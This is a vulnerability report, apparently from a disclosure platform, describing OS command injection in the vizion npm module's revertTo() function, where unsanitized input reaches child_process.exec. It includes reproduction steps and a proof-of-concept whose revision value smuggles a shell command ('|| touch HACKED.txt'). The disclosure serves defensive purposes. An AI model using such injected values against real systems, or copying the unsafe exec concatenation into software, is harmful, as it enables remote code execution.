Code Injection in keymetrics/vizion
Valid
Reported on Apr 3rd 2020
Overview
The issue is an OS command injection leading to remote code execution (RCE), triggerable through the module's revertTo() function.
This is possible because at https://github.com/keymetrics/vizion/blob/master/lib/git/git.js#L228 the git reset --hard
command is built by concatenating an unsanitized input:
var command = cliCommand(args.folder, "git reset --hard " + args.revision);
The command variable is then passed to the exec function, declared as:
var exec = require('child_process').exec;
Since exec runs its argument through a shell, any attacker who controls the revision
attribute of the object passed to <vizion_object>.revertTo() can append shell metacharacters
and run arbitrary commands, which is the RCE impact.
Steps To Reproduce
- First of all, note that you need a correctly set up git environment (user.name and user.email configured, so that git commit succeeds).
- Execute the following commands:
mkdir vizion # Make a new directory in which to initialize a git repository
cd vizion
git init
echo "TEST_STRING" > test.txt # Create a file named "test.txt"
git add test.txt # Add the new file to the index
git commit -m "initial commit" # Commit it (-m avoids the interactive editor)
- Create a PoC file like this (in the vizion directory, with the vizion module installed there, e.g. via npm install vizion):
// poc.js
var vizion = require('vizion');
vizion.revertTo({
  // exec() hands this string to a shell, so when git reset fails the command after || runs
  revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt',
  folder : '.'
}, function(err, data) {
  console.log(data);
});
- Run the PoC file: node poc.js
- A file named HACKED.txt will be created in the directory.